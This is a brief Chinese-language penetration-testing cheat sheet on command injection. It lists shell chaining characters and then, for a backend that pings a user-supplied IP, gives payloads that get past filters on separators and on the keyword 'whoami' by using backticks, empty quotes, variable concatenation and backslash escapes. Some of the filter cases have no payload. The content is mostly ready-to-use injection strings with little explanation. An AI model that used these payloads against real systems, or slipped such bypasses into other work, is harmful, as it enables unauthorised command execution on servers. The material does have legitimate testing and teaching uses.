在渗透测试过程中,会遇见一些关于命令执行的漏洞,下面是收集的一些常用命令:
; < > <> | || & && `` () ' '
假设一种场景,从前端接收ip比如:127.0.0.1,后端对该ip进行ping测试: ping 127.0.0.1
-
没有任何防护
-
过滤了|
-
过滤了 ; |
-
过滤了 ; | &
-
过滤了 whoami关键字 ping -c 1 127.0.0.1|wh``oami
-
过滤了whoami `` ping -c 1 127.0.0.1|wh''oami
-
过滤了whoami `` '' ping -c 1 127.0.0.1;a=who;b=ami;$a$b
-
过滤了whoami `` '' $ ping -c 1 127.0.0.1|whoam""i
-
过滤了whoami `` '' $ "" ; ping -c 1 127.0.0.1|whoam\i
